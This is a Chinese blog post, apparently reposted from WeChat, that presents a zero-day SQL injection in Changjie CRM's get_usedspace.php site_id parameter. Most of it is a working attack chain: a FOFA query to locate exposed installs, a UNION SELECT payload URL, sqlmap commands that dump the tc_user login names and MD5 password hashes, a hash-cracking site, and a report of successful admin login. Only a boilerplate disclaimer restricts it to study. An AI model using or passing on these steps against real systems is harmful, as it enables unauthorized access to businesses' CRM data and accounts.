【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码

渗透技巧 1年前 (2023) admin
131 0 0

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码

一、漏洞描述

畅捷CRM get_userspace.php文件中 site_id参数存在SQL注入漏洞

二、影响范围


畅捷CRM

【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码


三、fofa查询


title="畅捷CRM"


四、漏洞检测


直接浏览器访问:

http://ip:port/WebSer~1/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20CONCAT(0x7178767671,0x5664726e476a637a565a50614d4c435745446a50614756506d486d58544b4e646d7a577170685165,0x7171626b71)--

返回结果如下,则存在SQL注入漏洞

【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码

批量监测


五、漏洞利用


使用SQLmap进行漏洞利用

获取当前数据库名称

sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch  --current-db


【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码


获取当前数据库表名

sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1 --batch --dbms=mysql -D crmsaas_plus --tables


【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码


获取系统当前用户名密码, 密码都是md5 加密的,简单的密码会自动爆破出来。


sqlmap -u http://ip:port/WebSer~1/get_usedspace.php?site_id=1  --batch -D crmsaas_plus -T tc_user -C login_name,login_password -dump


【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码


可以使用https://cmd5.com/ 对加密的密码解密

【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码

获取账号密码后成功登录

【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码


免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码


原文始发于微信公众号(网络安全透视镜):【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码

版权声明:admin 发表于 2023年9月22日 下午1:10。
转载请注明:【0 day】畅捷CRM SQL注入漏洞获取管理员账号密码 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...